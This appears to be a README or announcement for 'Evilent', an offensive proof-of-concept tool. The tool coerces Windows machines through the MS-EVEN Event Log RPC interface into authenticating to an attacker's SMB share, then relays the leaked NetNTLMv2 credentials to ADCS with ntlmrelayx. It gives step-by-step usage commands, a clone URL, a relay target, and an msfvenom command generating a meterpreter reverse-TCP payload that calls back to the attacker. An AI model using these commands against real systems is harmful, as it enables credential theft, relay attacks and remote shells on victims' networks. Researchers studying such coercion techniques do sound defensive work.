Evilent PoC Exposes Windows Event Log Vulnerability, Leaking NetNTLMv2 Credentials via SMB Share
Evilent Coerce
A practical NTLM relay attack using the MS-EVEN RPC protocol and antivirus-assisted coercion.
Evilent is a PoC tool that triggers the ElfrOpenBELW procedure in the MS-EVEN RPC interface (used for Windows Event Log service), causing the target machine to connect to an attacker-controlled SMB share. If antivirus software (e.g., Defender) is present, it may scan the file and unintentionally leak NetNTLMv2 credentials, which can be relayed via ntlmrelayx.
This project includes:
- evilent.py — triggers the MS-EVEN coercion
- fefender.py — helper script to run impacket-smbserver and ntlmrelayx in parallel for harvesting and relaying credentials
This attack is a combination of previously known techniques:
- MS-EVEN coercion (originally PoC’d in C by @evilashz)
- NTLM leak through antivirus file scanning behavior
- Credential relaying via impacket’s ntlmrelayx
Download
git clone https://github.com/Thunter-HackTeam/EvilentCoerce.git
Use
Step 1: Start listener (SMB + relay)
In one terminal:
python3 fefender.py
–smbserver-args=’Share ./ -smb2support’
–ntlmrelayx-args=’-smb2support -t http://192.168.140.218/certsrv/certfnsh.asp –adcs –keep-relaying’
This will launch both:
- impacket-smbserver to serve the bait file
- ntlmrelayx to relay NTLM authentication to a target (e.g., ADCS)
Step 2: Trigger the attack
In another terminal:
python3 evilent.py -backupfile Sharename\filename
domain/username:password@target listener
- target: The victim machine (can be given as [domain/]username[:password]@<ip>)
- Listener IP: IP of the attacker’s SMB server
- -backupfile: Optional filename to request (msfvenom generate this file)
Notes
- The attack works only in Active Directory environments.
- Authentication often comes from NT AUTHORITY\LOCAL SERVICE, but antivirus activity may cause the host machine account to leak NetNTLMv2.
- Exploitable file name variations (e.g., test.exeem䵌䵅P) must be prepared ahead on the SMB share.
- Evilent.py generate exe file with MSFVenom (msfvenom -p windows/meterpreter/reverse_tcp LHOST={listen_ip} LPORT=4444 -f exe -o {name})
- Environment variables like %USERNAME% may be expanded when referenced in UNC paths (e.g., \\attacker\%USERNAME%) — potential info leak.
